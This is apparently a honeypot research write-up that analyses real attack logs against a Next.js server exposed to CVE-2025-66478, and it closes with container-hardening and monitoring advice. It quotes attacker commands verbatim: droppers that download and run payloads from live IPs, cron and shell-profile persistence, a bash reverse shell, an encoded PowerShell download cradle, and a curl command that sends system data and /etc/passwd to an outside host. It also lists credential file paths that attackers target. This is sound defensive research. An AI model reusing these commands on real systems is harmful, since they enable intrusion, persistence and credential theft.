Share
## https://sploitus.com/exploit?id=A94D4A29-F107-53E1-B222-D8B25E127059
# CVE-2025-66478 – Next.js Server Actions RCE Vulnerability: Analysis of Actual Attack Logs

## Overview

This project collects real attack logs from a Next.js 15.1.2 application exposed on the internet, running in Docker containers. These logs demonstrate how the CVE-2025-66478 vulnerability was scanned and exploited by various automated attack tools. **Time range**: December 4, 2025 – December 6, 2025 (approximately 48 hours)

**Environment information**:
- Framework: Next.js 15.1.2
- Execution environment: Bun v1.2.20
- Container: Docker (Alpine Linux)
- Time zone: Asia/Taipei

---

## Statistics of Attack Types

### 1. Malicious Program Download and Execution (Dropper/Downloader)

Attackers attempted to execute malicious programs via the vulnerability. | Attack Source IP | Malicious Program URL | Description |
|------------|-------------|------|
| 216.158.232.43 | `http://216.158.232.43:12000/sex.sh` | Zombie network/mining program |
| 38.207.161.212 | `http://38.207.161.212/agent` | Malicious agent program |
| 43.156.63.124 | `http://43.156.63.124/tsd` | Cron backdoor |
| 154.38.121.219 | `res.qiqigece.top/nginx3` | Malicious program disguised as nginx |
| 47.79.42.91 | `iot.632313373.xyz/nz.sh` | IoT zombie network script |
| 47.79.65.237 | `sup001.oss-cn-hongkong.aliyuncs.com/python1.sh` | Mining/backdoor program |
| 103.135.101.15 | `http://103.135.101.15/wocaosinm.sh` | Malicious script |
| 38.12.24.231 | `http://38.12.24.231/kworker` | Malicious program disguised as kernel worker |
| 128.199.194.97 | `http://128.199.194.97:9001/setup2.sh` | Initialization script |

#### Example of Attack Command

```bash
# Typical dropper attack
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a
```

# Implanting a cron-based persistent backdoor

```bash
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd
```

# Complex persistent attack (attempting multiple download methods + cron + bashrc)

```bash
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done
```

### 2. Reverse Shell

Attackers attempted to establish a reverse shell connection for interactive access. ```bash
# Bash reverse shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"
```

### 3. PowerShell Attack (Misidentification for Windows Systems)

Attackers assumed the target was a Windows system and attempted to execute PowerShell commands. ```powershell
# Base64-encoded malicious PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# After decoding:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Mathematical calculation for vulnerability verification
powershell -c "41*271"      # = 11111 (character code verification)
powershell -c "44225*41002" # = 1814113450
```

### 4.

### Information Gathering  
The attacker attempts to collect system information for subsequent attacks.  
```bash
# Collect system information and transmit it externally
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`
```

### Credential Harvesting  
The attacker attempts to read various sensitive files and credentials.  
#### Paths for reading sensitive data  
| Category | Path |
|----------|------|
| **Cloud credentials** | `/root/.aws/credentials`, `/root/.aws/config` |
| | `/root/.config/gcloud/credentials.db` |
| | `/root/.config/gcloud/application_default_credentials` |
| **SSH keys** | `/root/.ssh/id_rsa`, `/root/.ssh/config` |
| **Git credentials** | `/root/.git-credentials`, `/root/.gitconfig` |
| **Containers/Kubernetes** | `/root/.docker/config`, `/root/.kube/config` |
| | `/var/lib/kubelet/config.yaml` |
| **Applications** | `/proc/self/cwd/serviceAccountKey.json` (Firebase) |
| | `/proc/self/cwd/prisma/.env`, `/proc/self/cwd/prisma/schema.prisma` |
| **Shell history** | `/root/.bash_history`, `/root/.zsh_history` |
| **Cloud tools** | `/root/.ossutilconfig` (Alibaba Cloud OSS) |
| | `/root/.npmrc` |
| **System settings** | `/etc/ansible/ansible.cfg`, `/etc/passwd`, `/etc/shadow` |

### Leaking Environment Variables  
After successfully leaking environment variables through a vulnerability:  
```
HOSTNAME=6973aeebae41  
BUN_INSTALL_BIN=/usr/local/bin  
HOME=/root  
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin  
PWD=/app  
TZ=Asia/Taipei  
NODE_ENV=production  
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0  
```

### DNS Exfiltration  
The attacker uses DNS queries to transfer data or confirm vulnerabilities:  
```bash
ping 5a58e4a0.log.dnslog.pp.ua.
```

---

## Reasons for Attack Failures  
Most attacks fail due to the minimalistic nature of Alpine Linux containers:  

| Missing Tools | Impact |
|-------------|-------|
| `curl` | Unable to download malicious payloads |
| `bash` | Unable to execute commands with specific syntax (e.g., reverse shells) |
| `powershell` | Ineffective for Windows attacks |
| `python` | Unable to use Python downloaders |

Although `wget` is available, some malicious scripts still rely on `curl` or `bash`, leading to execution failures.

---

## Example of Base64 Decoding  
The log file contains a large amount of Base64-encoded data. Here’s an example of decoding some of them:

### System Information Leakage  
```
# digest: 'cm9vdAo='  
Decoded: root  
# digest: 'dGVzdAo='  
Decoded: test  
# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='  
Decoded: vulnerability_test  
# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='  
Decoded: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
```

### Directory Contents Leakage  
```
# Contents of /tmp directory  
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Decoded: total 20  
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 . drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
```

--

## Statistics of Attack Sources

The following are the attack source IP addresses recorded:

| IP Address | Country/Region (Estimated) | Attack Type |
|-----------|-----------------------------|--------------|
| 216.158.232.43 | United States | Dropper |
| 38.165.44.205 | United States | Dropper |
| 23.95.44.80 | United States | Dropper |
| 154.38.121.219 | Hong Kong | Malware (nginx3) |
| 38.207.161.212 | United States | Agent |
| 43.156.63.124 | China | Cron Backdoor |
| 47.79.42.91 | China (Alibaba Cloud) | IoT Zombie Network |
| 47.79.65.237 | China (Alibaba Cloud) | Mining Program |
| 119.45.243.154 | China (Tencent Cloud) | Mining Program |
| 144.22.210.54 | Brazil | Dropper |
| 217.60.249.228 | Sweden | Dropper |
| 154.26.192.32 | United States | Reverse Shell |
| 156.234.209.103 | Unknown | PowerShell Load |
| 38.60.212.106 | United States | Information Collection |
| 103.135.101.15 | Vietnam | Zombie Network |
| 128.199.194.97 | Singapore (DigitalOcean) | Setup Script |
| 38.12.24.231 | United States | Persistently Malicious Program |

--

## Attack Vectors

### Server Action Calls

The attacker attempted to call non-existent Server Actions:

```
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"
```

### Information Leakage in Error Messages

The attacker exploited the `digest` field in error messages to leak data:

```javascript
Error: x
  digest: 'cm9vdAo='  // Base64-encoded 'root'
```

--

## Key Points for Learning

### 1. Best Practices for Container Security

- **Minimize Image Files**: Use minimal base images (e.g., Alpine) to reduce vulnerability exposure.
- **Remove Unnecessary Tools**: Do not install tools like `curl`, `bash`, and `python` that can be abused.
- **Read-Only File System**: Run containers with `--read-only`.
- **Non-Root Users**: Execute applications using non-privileged users.

### 2. Vulnerability Patches

- Upgrade Next.js to a patched version.
- Verify the inputs of Server Actions.
- Implement WAF rules to filter suspicious requests.

### 3. Monitoring and Detection

- Monitor abnormal subroutine executions.
- Monitor network connection requests.
- Monitor attempts to access sensitive files.

---

## Disclaimer

This project is solely for educational and research purposes. All recorded attacks are real attempts at attacks against honeypots for research purposes. Do not use this information for any illegal purposes.

---

## Examples of Malware

This project includes real examples of malware extracted from attack logs. For detailed analysis, please refer to:

**[malware_samples/ANALYSIS.md](malware_samples/ANALYSIS.md)**

### Obtained Samples

| File | Type | Size | Source | Threat Level |
|-----|------|------|-------|------------|
| [nz.sh](malware_samples/nz.sh) | Shell Script | 931 B | iot.632313373.xyz | Medium |
| [tsd.sh](malware_samples/tsd.sh) | Shell Script | 1.7 KB | 43.156.63.124 | High |
| [tsd](malware_samples/tsd) | ELF 64-bit | 6.8 MB | 43.156.63.124 | High |
| [init.sh](malware_samples/init.sh) | Shell Script | 6.1 KB | AWS S3 | Severe |
| [agent](malware_samples/agent) | ELF 64-bit | 23.7 MB | AWS S3 | Severe |
| [Agtisx.exe](malware_samples/Agtisx.exe) | PE32+ (Windows) | 24.0 MB | AWS S3 | Severe |

### Summary of Attack Methods

1. **nz.sh** – Installs the Nezha monitoring agent for remote monitoring of victims’ machines.
2. **tsd.sh + tsd** – Creates multiple persistence mechanisms (cron, systemd, rc.local).
3. **init.sh + agent** – Complete backdoor framework, supporting multi-system, automatic restart, and log recording.

---

## Related Resources

- [Next.js Security Advisories](https://github.com/vercel/next.js/security/advisories)
- [OWASP - Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
- [MITRE ATT&CK - Execution](https://attack.mitre.org/tactics/TA0002/)

---

## License

MIT License